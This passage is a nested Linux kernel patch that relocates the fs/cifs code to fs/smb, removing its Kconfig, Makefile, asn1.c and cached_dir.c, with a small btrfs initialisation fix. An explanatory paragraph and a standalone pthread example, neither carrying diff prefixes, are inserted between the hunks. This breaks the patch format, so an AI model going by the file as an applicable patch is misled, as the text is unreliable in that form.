++		mutex_unlock(&vq->mutex);
++	}
++
+ 	return 0;
+ }
+ 
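
The vhost-vdpa fix above reads back the features the device actually
negotiated and publishes them to every virtqueue under that queue's own
mutex, so vq handlers never observe a stale acked_features value. A minimal
pthread sketch of the same publish-under-lock pattern, with the structures
reduced to the essentials:

#include <stdio.h>
#include <pthread.h>

/* Sketch: publish the negotiated feature bits to each queue while
 * holding that queue's mutex, mirroring the per-vq locking above.
 */
struct vq {
	pthread_mutex_t mutex;
	unsigned long long acked_features;
};

static void propagate_features(struct vq *vqs, int nvqs,
			       unsigned long long actual)
{
	for (int i = 0; i < nvqs; i++) {
		pthread_mutex_lock(&vqs[i].mutex);
		vqs[i].acked_features = actual;
		pthread_mutex_unlock(&vqs[i].mutex);
	}
}

int main(void)
{
	struct vq vqs[2] = {
		{ PTHREAD_MUTEX_INITIALIZER, 0 },
		{ PTHREAD_MUTEX_INITIALIZER, 0 },
	};

	/* bit 32 is VIRTIO_F_VERSION_1 */
	propagate_features(vqs, 2, 0x1ULL << 32);
	printf("vq0 features: %llx\n", vqs[0].acked_features);
	return 0;
}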
+diff --git a/fs/Kconfig b/fs/Kconfig
+index 2685a4d0d3531..703a1cea0fc09 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -371,14 +371,7 @@ config NFS_V4_2_SSC_HELPER
+ source "net/sunrpc/Kconfig"
+ source "fs/ceph/Kconfig"
+ 
+-source "fs/cifs/Kconfig"
+-source "fs/ksmbd/Kconfig"
+-
+-config SMBFS_COMMON
+-	tristate
+-	default y if CIFS=y || SMB_SERVER=y
+-	default m if CIFS=m || SMB_SERVER=m
+-
++source "fs/smb/Kconfig"
+ source "fs/coda/Kconfig"
+ source "fs/afs/Kconfig"
+ source "fs/9p/Kconfig"
+diff --git a/fs/Makefile b/fs/Makefile
+index 80ab0154419ec..9b7bcf6e54cd4 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -94,9 +94,7 @@ obj-$(CONFIG_LOCKD)		+= lockd/
+ obj-$(CONFIG_NLS)		+= nls/
+ obj-y				+= unicode/
+ obj-$(CONFIG_SYSV_FS)		+= sysv/
+-obj-$(CONFIG_SMBFS_COMMON)	+= smbfs_common/
+-obj-$(CONFIG_CIFS)		+= cifs/
+-obj-$(CONFIG_SMB_SERVER)	+= ksmbd/
++obj-$(CONFIG_SMBFS)		+= smb/
+ obj-$(CONFIG_HPFS_FS)		+= hpfs/
+ obj-$(CONFIG_NTFS_FS)		+= ntfs/
+ obj-$(CONFIG_NTFS3_FS)		+= ntfs3/
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index e71464c0e4667..00be69ce7b90f 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -6205,7 +6205,7 @@ static int log_delayed_deletions_incremental(struct btrfs_trans_handle *trans,
+ {
+ 	struct btrfs_root *log = inode->root->log_root;
+ 	const struct btrfs_delayed_item *curr;
+-	u64 last_range_start;
++	u64 last_range_start = 0;
+ 	u64 last_range_end = 0;
+ 	struct btrfs_key key;
+ 
+diff --git a/fs/cifs/Kconfig b/fs/cifs/Kconfig
+deleted file mode 100644
+index 3b7e3b9e4fd2e..0000000000000
+--- a/fs/cifs/Kconfig
++++ /dev/null
+@@ -1,203 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0-only
+-config CIFS
+-	tristate "SMB3 and CIFS support (advanced network filesystem)"
+-	depends on INET
+-	select NLS
+-	select CRYPTO
+-	select CRYPTO_MD5
+-	select CRYPTO_SHA256
+-	select CRYPTO_SHA512
+-	select CRYPTO_CMAC
+-	select CRYPTO_HMAC
+-	select CRYPTO_AEAD2
+-	select CRYPTO_CCM
+-	select CRYPTO_GCM
+-	select CRYPTO_ECB
+-	select CRYPTO_AES
+-	select KEYS
+-	select DNS_RESOLVER
+-	select ASN1
+-	select OID_REGISTRY
+-	help
+-	  This is the client VFS module for the SMB3 family of NAS protocols,
+-	  (including support for the most recent, most secure dialect SMB3.1.1)
+-	  as well as for earlier dialects such as SMB2.1, SMB2 and the older
+-	  Common Internet File System (CIFS) protocol.  CIFS was the successor
+-	  to the original dialect, the Server Message Block (SMB) protocol, the
+-	  native file sharing mechanism for most early PC operating systems.
+-
+-	  The SMB3 protocol is supported by most modern operating systems
+-	  and NAS appliances (e.g. Samba, Windows 10, Windows Server 2016,
+-	  MacOS) and even in the cloud (e.g. Microsoft Azure).
+-	  The older CIFS protocol was included in Windows NT4, 2000 and XP (and
+-	  later) as well by Samba (which provides excellent CIFS and SMB3
+-	  server support for Linux and many other operating systems). Use of
+-	  dialects older than SMB2.1 is often discouraged on public networks.
+-	  This module also provides limited support for OS/2 and Windows ME
+-	  and similar very old servers.
+-
+-	  This module provides an advanced network file system client
+-	  for mounting to SMB3 (and CIFS) compliant servers.  It includes
+-	  support for DFS (hierarchical name space), secure per-user
+-	  session establishment via Kerberos or NTLM or NTLMv2, RDMA
+-	  (smbdirect), advanced security features, per-share encryption,
+-	  directory leases, safe distributed caching (oplock), optional packet
+-	  signing, Unicode and other internationalization improvements.
+-
+-	  In general, the default dialects, SMB3 and later, enable better
+-	  performance, security and features, than would be possible with CIFS.
+-	  Note that when mounting to Samba, due to the CIFS POSIX extensions,
+-	  CIFS mounts can provide slightly better POSIX compatibility
+-	  than SMB3 mounts. SMB2/SMB3 mount options are also
+-	  slightly simpler (compared to CIFS) due to protocol improvements.
+-
+-	  If you need to mount to Samba, Azure, Macs or Windows from this machine, say Y.
+-
+-config CIFS_STATS2
+-	bool "Extended statistics"
+-	depends on CIFS
+-	default y
+-	help
+-	  Enabling this option will allow more detailed statistics on SMB
+-	  request timing to be displayed in /proc/fs/cifs/DebugData and also
+-	  allow optional logging of slow responses to dmesg (depending on the
+-	  value of /proc/fs/cifs/cifsFYI). See Documentation/admin-guide/cifs/usage.rst
+-	  for more details. These additional statistics may have a minor effect
+-	  on performance and memory utilization.
+-
+-	  If unsure, say Y.
+-
+-config CIFS_ALLOW_INSECURE_LEGACY
+-	bool "Support legacy servers which use less secure dialects"
+-	depends on CIFS
+-	default y
+-	help
+-	  Modern dialects, SMB2.1 and later (including SMB3 and 3.1.1), have
+-	  additional security features, including protection against
+-	  man-in-the-middle attacks and stronger crypto hashes, so the use
+-	  of legacy dialects (SMB1/CIFS and SMB2.0) is discouraged.
+-
+-	  Disabling this option prevents users from using vers=1.0 or vers=2.0
+-	  on mounts with cifs.ko
+-
+-	  If unsure, say Y.
+-
+-config CIFS_UPCALL
+-	bool "Kerberos/SPNEGO advanced session setup"
+-	depends on CIFS
+-	help
+-	  Enables an upcall mechanism for CIFS which accesses userspace helper
+-	  utilities to provide SPNEGO packaged (RFC 4178) Kerberos tickets
+-	  which are needed to mount to certain secure servers (for which more
+-	  secure Kerberos authentication is required). If unsure, say Y.
+-
+-config CIFS_XATTR
+-	bool "CIFS extended attributes"
+-	depends on CIFS
+-	help
+-	  Extended attributes are name:value pairs associated with inodes by
+-	  the kernel or by users (see the attr(5) manual page for details).
+-	  CIFS maps the name of extended attributes beginning with the user
+-	  namespace prefix to SMB/CIFS EAs.  EAs are stored on Windows
+-	  servers without the user namespace prefix, but their names are
+-	  seen by Linux cifs clients prefaced by the user namespace prefix.
+-	  The system namespace (used by some filesystems to store ACLs) is
+-	  not supported at this time.
+-
+-	  If unsure, say Y.
+-
+-config CIFS_POSIX
+-	bool "CIFS POSIX Extensions"
+-	depends on CIFS && CIFS_ALLOW_INSECURE_LEGACY && CIFS_XATTR
+-	help
+-	  Enabling this option will cause the cifs client to attempt to
+-	  negotiate a newer dialect with servers, such as Samba 3.0.5
+-	  or later, that optionally can handle more POSIX like (rather
+-	  than Windows like) file behavior.  It also enables
+-	  support for POSIX ACLs (getfacl and setfacl) to servers
+-	  (such as Samba 3.10 and later) which can negotiate
+-	  CIFS POSIX ACL support.  If unsure, say N.
+-
+-config CIFS_DEBUG
+-	bool "Enable CIFS debugging routines"
+-	default y
+-	depends on CIFS
+-	help
+-	  Enabling this option adds helpful debugging messages to
+-	  the cifs code which increases the size of the cifs module.
+-	  If unsure, say Y.
+-
+-config CIFS_DEBUG2
+-	bool "Enable additional CIFS debugging routines"
+-	depends on CIFS_DEBUG
+-	help
+-	  Enabling this option adds a few more debugging routines
+-	  to the cifs code which slightly increases the size of
+-	  the cifs module and can cause additional logging of debug
+-	  messages in some error paths, slowing performance. This
+-	  option can be turned off unless you are debugging
+-	  cifs problems.  If unsure, say N.
+-
+-config CIFS_DEBUG_DUMP_KEYS
+-	bool "Dump encryption keys for offline decryption (Unsafe)"
+-	depends on CIFS_DEBUG
+-	help
+-	  Enabling this will dump the encryption and decryption keys
+-	  used to communicate on an encrypted share connection on the
+-	  console. This allows Wireshark to decrypt and dissect
+-	  encrypted network captures. Enable this carefully.
+-	  If unsure, say N.
+-
+-config CIFS_DFS_UPCALL
+-	bool "DFS feature support"
+-	depends on CIFS
+-	help
+-	  Distributed File System (DFS) support is used to access shares
+-	  transparently in an enterprise name space, even if the share
+-	  moves to a different server.  This feature also enables
+-	  an upcall mechanism for CIFS which contacts userspace helper
+-	  utilities to provide server name resolution (host names to
+-	  IP addresses) which is needed in order to reconnect to
+-	  servers if their addresses change or for implicit mounts of
+-	  DFS junction points. If unsure, say Y.
+-
+-config CIFS_SWN_UPCALL
+-	bool "SWN feature support"
+-	depends on CIFS
+-	help
+-	  The Service Witness Protocol (SWN) is used to get notifications
+-	  from a highly available server of resource state changes. This
+-	  feature enables an upcall mechanism for CIFS which contacts a
+-	  userspace daemon to establish the DCE/RPC connection to retrieve
+-	  the cluster available interfaces and resource change notifications.
+-	  If unsure, say Y.
+-
+-config CIFS_NFSD_EXPORT
+-	bool "Allow nfsd to export CIFS file system"
+-	depends on CIFS && BROKEN
+-	help
+-	  Allows NFS server to export a CIFS mounted share (nfsd over cifs)
+-
+-config CIFS_SMB_DIRECT
+-	bool "SMB Direct support"
+-	depends on CIFS=m && INFINIBAND && INFINIBAND_ADDR_TRANS || CIFS=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
+-	help
+-	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
+-	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
+-	  say Y.
+-
+-config CIFS_FSCACHE
+-	bool "Provide CIFS client caching support"
+-	depends on CIFS=m && FSCACHE || CIFS=y && FSCACHE=y
+-	help
+-	  Makes CIFS FS-Cache capable. Say Y here if you want your CIFS data
+-	  to be cached locally on disk through the general filesystem cache
+-	  manager. If unsure, say N.
+-
+-config CIFS_ROOT
+-	bool "SMB root file system (Experimental)"
+-	depends on CIFS=y && IP_PNP
+-	help
+-	  Enables root file system support over SMB protocol.
+-
+-	  Most people say N here.
+diff --git a/fs/cifs/Makefile b/fs/cifs/Makefile
+deleted file mode 100644
+index 7c9785973f496..0000000000000
+--- a/fs/cifs/Makefile
++++ /dev/null
+@@ -1,34 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0
+-#
+-# Makefile for Linux CIFS/SMB2/SMB3 VFS client
+-#
+-ccflags-y += -I$(src)		# needed for trace events
+-obj-$(CONFIG_CIFS) += cifs.o
+-
+-cifs-y := trace.o cifsfs.o cifs_debug.o connect.o dir.o file.o \
+-	  inode.o link.o misc.o netmisc.o smbencrypt.o transport.o \
+-	  cached_dir.o cifs_unicode.o nterr.o cifsencrypt.o \
+-	  readdir.o ioctl.o sess.o export.o unc.o winucase.o \
+-	  smb2ops.o smb2maperror.o smb2transport.o \
+-	  smb2misc.o smb2pdu.o smb2inode.o smb2file.o cifsacl.o fs_context.o \
+-	  dns_resolve.o cifs_spnego_negtokeninit.asn1.o asn1.o
+-
+-$(obj)/asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.h
+-
+-$(obj)/cifs_spnego_negtokeninit.asn1.o: $(obj)/cifs_spnego_negtokeninit.asn1.c $(obj)/cifs_spnego_negtokeninit.asn1.h
+-
+-cifs-$(CONFIG_CIFS_XATTR) += xattr.o
+-
+-cifs-$(CONFIG_CIFS_UPCALL) += cifs_spnego.o
+-
+-cifs-$(CONFIG_CIFS_DFS_UPCALL) += cifs_dfs_ref.o dfs_cache.o
+-
+-cifs-$(CONFIG_CIFS_SWN_UPCALL) += netlink.o cifs_swn.o
+-
+-cifs-$(CONFIG_CIFS_FSCACHE) += fscache.o
+-
+-cifs-$(CONFIG_CIFS_SMB_DIRECT) += smbdirect.o
+-
+-cifs-$(CONFIG_CIFS_ROOT) += cifsroot.o
+-
+-cifs-$(CONFIG_CIFS_ALLOW_INSECURE_LEGACY) += smb1ops.o cifssmb.o
+diff --git a/fs/cifs/asn1.c b/fs/cifs/asn1.c
+deleted file mode 100644
+index b5724ef9f182f..0000000000000
+--- a/fs/cifs/asn1.c
++++ /dev/null
+@@ -1,63 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-
+-#include <linux/module.h>
+-#include <linux/kernel.h>
+-#include <linux/oid_registry.h>
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-#include "cifs_spnego_negtokeninit.asn1.h"
+-
+-int
+-decode_negTokenInit(unsigned char *security_blob, int length,
+-		    struct TCP_Server_Info *server)
+-{
+-	if (asn1_ber_decoder(&cifs_spnego_negtokeninit_decoder, server,
+-			     security_blob, length) == 0)
+-		return 1;
+-	else
+-		return 0;
+-}
+-
+-int cifs_gssapi_this_mech(void *context, size_t hdrlen,
+-			  unsigned char tag, const void *value, size_t vlen)
+-{
+-	enum OID oid;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid != OID_spnego) {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		cifs_dbg(FYI, "Error decoding negTokenInit header: unexpected OID %s\n",
+-			 buf);
+-		return -EBADMSG;
+-	}
+-	return 0;
+-}
+-
+-int cifs_neg_token_init_mech_type(void *context, size_t hdrlen,
+-				  unsigned char tag,
+-				  const void *value, size_t vlen)
+-{
+-	struct TCP_Server_Info *server = context;
+-	enum OID oid;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid == OID_mskrb5)
+-		server->sec_mskerberos = true;
+-	else if (oid == OID_krb5u2u)
+-		server->sec_kerberosu2u = true;
+-	else if (oid == OID_krb5)
+-		server->sec_kerberos = true;
+-	else if (oid == OID_ntlmssp)
+-		server->sec_ntlmssp = true;
+-	else {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		cifs_dbg(FYI, "Decoding negTokenInit: unsupported OID %s\n",
+-			 buf);
+-	}
+-	return 0;
+-}
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+deleted file mode 100644
+index bfc964b36c72e..0000000000000
+--- a/fs/cifs/cached_dir.c
++++ /dev/null
+@@ -1,606 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *  Functions to handle the cached directory entries
+- *
+- *  Copyright (c) 2022, Ronnie Sahlberg <lsahlber@redhat.com>
+- */
+-
+-#include <linux/namei.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "smb2proto.h"
+-#include "cached_dir.h"
+-
+-static struct cached_fid *init_cached_dir(const char *path);
+-static void free_cached_dir(struct cached_fid *cfid);
+-static void smb2_close_cached_fid(struct kref *ref);
+-
+-static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
+-						    const char *path,
+-						    bool lookup_only)
+-{
+-	struct cached_fid *cfid;
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry(cfid, &cfids->entries, entry) {
+-		if (!strcmp(cfid->path, path)) {
+-			/*
+-			 * If it doesn't have a lease it is either not yet
+-			 * fully cached or it may be in the process of
+-			 * being deleted due to a lease break.
+-			 */
+-			if (!cfid->has_lease) {
+-				spin_unlock(&cfids->cfid_list_lock);
+-				return NULL;
+-			}
+-			kref_get(&cfid->refcount);
+-			spin_unlock(&cfids->cfid_list_lock);
+-			return cfid;
+-		}
+-	}
+-	if (lookup_only) {
+-		spin_unlock(&cfids->cfid_list_lock);
+-		return NULL;
+-	}
+-	if (cfids->num_entries >= MAX_CACHED_FIDS) {
+-		spin_unlock(&cfids->cfid_list_lock);
+-		return NULL;
+-	}
+-	cfid = init_cached_dir(path);
+-	if (cfid == NULL) {
+-		spin_unlock(&cfids->cfid_list_lock);
+-		return NULL;
+-	}
+-	cfid->cfids = cfids;
+-	cfids->num_entries++;
+-	list_add(&cfid->entry, &cfids->entries);
+-	cfid->on_list = true;
+-	kref_get(&cfid->refcount);
+-	spin_unlock(&cfids->cfid_list_lock);
+-	return cfid;
+-}
+-
+-static struct dentry *
+-path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
+-{
+-	struct dentry *dentry;
+-	const char *s, *p;
+-	char sep;
+-
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	dentry = dget(cifs_sb->root);
+-	s = path;
+-
+-	do {
+-		struct inode *dir = d_inode(dentry);
+-		struct dentry *child;
+-
+-		if (!S_ISDIR(dir->i_mode)) {
+-			dput(dentry);
+-			dentry = ERR_PTR(-ENOTDIR);
+-			break;
+-		}
+-
+-		/* skip separators */
+-		while (*s == sep)
+-			s++;
+-		if (!*s)
+-			break;
+-		p = s++;
+-		/* next separator */
+-		while (*s && *s != sep)
+-			s++;
+-
+-		child = lookup_positive_unlocked(p, dentry, s - p);
+-		dput(dentry);
+-		dentry = child;
+-	} while (!IS_ERR(dentry));
+-	return dentry;
+-}
+-
+-static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
+-				  const char *path)
+-{
+-	size_t len = 0;
+-
+-	if (!*path)
+-		return path;
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
+-	    cifs_sb->prepath) {
+-		len = strlen(cifs_sb->prepath) + 1;
+-		if (unlikely(len > strlen(path)))
+-			return ERR_PTR(-EINVAL);
+-	}
+-	return path + len;
+-}
+-
+-/*
+- * Open and cache a directory handle.
+- * If error then *cfid is not initialized.
+- */
+-int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+-		    const char *path,
+-		    struct cifs_sb_info *cifs_sb,
+-		    bool lookup_only, struct cached_fid **ret_cfid)
+-{
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct cifs_open_parms oparms;
+-	struct smb2_create_rsp *o_rsp = NULL;
+-	struct smb2_query_info_rsp *qi_rsp = NULL;
+-	int resp_buftype[2];
+-	struct smb_rqst rqst[2];
+-	struct kvec rsp_iov[2];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	int rc, flags = 0;
+-	__le16 *utf16_path = NULL;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_II;
+-	struct cifs_fid *pfid;
+-	struct dentry *dentry = NULL;
+-	struct cached_fid *cfid;
+-	struct cached_fids *cfids;
+-	const char *npath;
+-
+-	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
+-	    is_smb1_server(tcon->ses->server))
+-		return -EOPNOTSUPP;
+-
+-	ses = tcon->ses;
+-	server = ses->server;
+-	cfids = tcon->cfids;
+-
+-	if (!server->ops->new_lease_key)
+-		return -EIO;
+-
+-	if (cifs_sb->root == NULL)
+-		return -ENOENT;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	cfid = find_or_create_cached_dir(cfids, path, lookup_only);
+-	if (cfid == NULL) {
+-		kfree(utf16_path);
+-		return -ENOENT;
+-	}
+-	/*
+-	 * At this point we either have a lease already and we can just
+-	 * return it. If not we are guaranteed to be the only thread accessing
+-	 * this cfid.
+-	 */
+-	if (cfid->has_lease) {
+-		*ret_cfid = cfid;
+-		kfree(utf16_path);
+-		return 0;
+-	}
+-
+-	/*
+-	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
+-	 * calling ->lookup() which already adds those through
+-	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
+-	 * below when trying to send compounded request and then potentially
+-	 * having a different prefix path (e.g. after DFS failover).
+-	 */
+-	npath = path_no_prefix(cifs_sb, path);
+-	if (IS_ERR(npath)) {
+-		rc = PTR_ERR(npath);
+-		kfree(utf16_path);
+-		return rc;
+-	}
+-
+-	/*
+-	 * We do not hold the lock for the open because in case
+-	 * SMB2_open needs to reconnect.
+-	 * This is safe because no other thread will be able to get a ref
+-	 * to the cfid until we have finished opening the file and (possibly)
+-	 * acquired a lease.
+-	 */
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	pfid = &cfid->fid;
+-	server->ops->new_lease_key(pfid);
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.fid = pfid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto oshr_free;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	memset(&qi_iov, 0, sizeof(qi_iov));
+-	rqst[1].rq_iov = qi_iov;
+-	rqst[1].rq_nvec = 1;
+-
+-	rc = SMB2_query_info_init(tcon, server,
+-				  &rqst[1], COMPOUND_FID,
+-				  COMPOUND_FID, FILE_ALL_INFORMATION,
+-				  SMB2_O_INFO_FILE, 0,
+-				  sizeof(struct smb2_file_all_info) +
+-				  PATH_MAX * 2, 0, NULL);
+-	if (rc)
+-		goto oshr_free;
+-
+-	smb2_set_related(&rqst[1]);
+-
+-	rc = compound_send_recv(xid, ses, server,
+-				flags, 2, rqst,
+-				resp_buftype, rsp_iov);
+-	if (rc) {
+-		if (rc == -EREMCHG) {
+-			tcon->need_reconnect = true;
+-			pr_warn_once("server share %s deleted\n",
+-				     tcon->tree_name);
+-		}
+-		goto oshr_free;
+-	}
+-	cfid->tcon = tcon;
+-	cfid->is_open = true;
+-
+-	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+-	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
+-	oparms.fid->volatile_fid = o_rsp->VolatileFileId;
+-#ifdef CONFIG_CIFS_DEBUG2
+-	oparms.fid->mid = le64_to_cpu(o_rsp->hdr.MessageId);
+-#endif /* CIFS_DEBUG2 */
+-
+-	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+-		goto oshr_free;
+-
+-	smb2_parse_contexts(server, o_rsp,
+-			    &oparms.fid->epoch,
+-			    oparms.fid->lease_key, &oplock,
+-			    NULL, NULL);
+-	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
+-		goto oshr_free;
+-	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+-	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
+-		goto oshr_free;
+-	if (!smb2_validate_and_copy_iov(
+-				le16_to_cpu(qi_rsp->OutputBufferOffset),
+-				sizeof(struct smb2_file_all_info),
+-				&rsp_iov[1], sizeof(struct smb2_file_all_info),
+-				(char *)&cfid->file_all_info))
+-		cfid->file_all_info_is_valid = true;
+-
+-	if (!npath[0])
+-		dentry = dget(cifs_sb->root);
+-	else {
+-		dentry = path_to_dentry(cifs_sb, npath);
+-		if (IS_ERR(dentry)) {
+-			rc = -ENOENT;
+-			goto oshr_free;
+-		}
+-	}
+-	cfid->dentry = dentry;
+-	cfid->time = jiffies;
+-	cfid->has_lease = true;
+-
+-oshr_free:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_query_info_free(&rqst[1]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	spin_lock(&cfids->cfid_list_lock);
+-	if (rc && !cfid->has_lease) {
+-		if (cfid->on_list) {
+-			list_del(&cfid->entry);
+-			cfid->on_list = false;
+-			cfids->num_entries--;
+-		}
+-		rc = -ENOENT;
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-	if (!rc && !cfid->has_lease) {
+-		/*
+-		 * We are guaranteed to have two references at this point.
+-		 * One for the caller and one for a potential lease.
+-		 * Release the Lease-ref so that the directory will be closed
+-		 * when the caller closes the cached handle.
+-		 */
+-		kref_put(&cfid->refcount, smb2_close_cached_fid);
+-	}
+-	if (rc) {
+-		if (cfid->is_open)
+-			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+-				   cfid->fid.volatile_fid);
+-		free_cached_dir(cfid);
+-		cfid = NULL;
+-	}
+-
+-	if (rc == 0) {
+-		*ret_cfid = cfid;
+-		atomic_inc(&tcon->num_remote_opens);
+-	}
+-
+-	return rc;
+-}
+-
+-int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
+-			      struct dentry *dentry,
+-			      struct cached_fid **ret_cfid)
+-{
+-	struct cached_fid *cfid;
+-	struct cached_fids *cfids = tcon->cfids;
+-
+-	if (cfids == NULL)
+-		return -ENOENT;
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry(cfid, &cfids->entries, entry) {
+-		if (dentry && cfid->dentry == dentry) {
+-			cifs_dbg(FYI, "found a cached root file handle by dentry\n");
+-			kref_get(&cfid->refcount);
+-			*ret_cfid = cfid;
+-			spin_unlock(&cfids->cfid_list_lock);
+-			return 0;
+-		}
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-	return -ENOENT;
+-}
+-
+-static void
+-smb2_close_cached_fid(struct kref *ref)
+-{
+-	struct cached_fid *cfid = container_of(ref, struct cached_fid,
+-					       refcount);
+-
+-	spin_lock(&cfid->cfids->cfid_list_lock);
+-	if (cfid->on_list) {
+-		list_del(&cfid->entry);
+-		cfid->on_list = false;
+-		cfid->cfids->num_entries--;
+-	}
+-	spin_unlock(&cfid->cfids->cfid_list_lock);
+-
+-	dput(cfid->dentry);
+-	cfid->dentry = NULL;
+-
+-	if (cfid->is_open) {
+-		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+-			   cfid->fid.volatile_fid);
+-		atomic_dec(&cfid->tcon->num_remote_opens);
+-	}
+-
+-	free_cached_dir(cfid);
+-}
+-
+-void drop_cached_dir_by_name(const unsigned int xid, struct cifs_tcon *tcon,
+-			     const char *name, struct cifs_sb_info *cifs_sb)
+-{
+-	struct cached_fid *cfid = NULL;
+-	int rc;
+-
+-	rc = open_cached_dir(xid, tcon, name, cifs_sb, true, &cfid);
+-	if (rc) {
+-		cifs_dbg(FYI, "no cached dir found for rmdir(%s)\n", name);
+-		return;
+-	}
+-	spin_lock(&cfid->cfids->cfid_list_lock);
+-	if (cfid->has_lease) {
+-		cfid->has_lease = false;
+-		kref_put(&cfid->refcount, smb2_close_cached_fid);
+-	}
+-	spin_unlock(&cfid->cfids->cfid_list_lock);
+-	close_cached_dir(cfid);
+-}
+-
+-
+-void close_cached_dir(struct cached_fid *cfid)
+-{
+-	kref_put(&cfid->refcount, smb2_close_cached_fid);
+-}
+-
+-/*
+- * Called from cifs_kill_sb when we unmount a share
+- */
+-void close_all_cached_dirs(struct cifs_sb_info *cifs_sb)
+-{
+-	struct rb_root *root = &cifs_sb->tlink_tree;
+-	struct rb_node *node;
+-	struct cached_fid *cfid;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink;
+-	struct cached_fids *cfids;
+-
+-	for (node = rb_first(root); node; node = rb_next(node)) {
+-		tlink = rb_entry(node, struct tcon_link, tl_rbnode);
+-		tcon = tlink_tcon(tlink);
+-		if (IS_ERR(tcon))
+-			continue;
+-		cfids = tcon->cfids;
+-		if (cfids == NULL)
+-			continue;
+-		list_for_each_entry(cfid, &cfids->entries, entry) {
+-			dput(cfid->dentry);
+-			cfid->dentry = NULL;
+-		}
+-	}
+-}
+-
+-/*
+- * Invalidate all cached dirs when a TCON has been reset
+- * due to a session loss.
+- */
+-void invalidate_all_cached_dirs(struct cifs_tcon *tcon)
+-{
+-	struct cached_fids *cfids = tcon->cfids;
+-	struct cached_fid *cfid, *q;
+-	LIST_HEAD(entry);
+-
+-	spin_lock(&cfids->cfid_list_lock);
+-	list_for_each_entry_safe(cfid, q, &cfids->entries, entry) {
+-		list_move(&cfid->entry, &entry);
+-		cfids->num_entries--;
+-		cfid->is_open = false;
+-		cfid->on_list = false;
+-		/* To prevent race with smb2_cached_lease_break() */
+-		kref_get(&cfid->refcount);
+-	}
+-	spin_unlock(&cfids->cfid_list_lock);
+-
+-	list_for_each_entry_safe(cfid, q, &entry, entry) {
+-		list_del(&cfid->entry);
+-		cancel_work_sync(&cfid->lease_break);
+-		if (cfid->has_lease) {
+-			/*
+-			 * The lease was never cancelled by the server so we
+-			 * need to drop the reference.
+-			 */
+-			spin_lock(&cfids->cfid_list_lock);
+-			cfid->has_lease = false;
+-			spin_unlock(&cfids->cfid_list_lock);
+-			kref_put(&cfid->refcount, smb2_close_cached_fid);
+-		}
+-		/* Drop the extra reference opened above*/
+-		kref_put(&cfid->refcount, smb2_close_cached_fid);
+-	}
+-}
+-
+-static void
+-smb2_cached_lease_break(struct work_struct *work)
+-{
+-	struct cached_fid *cfid = container_of(work,
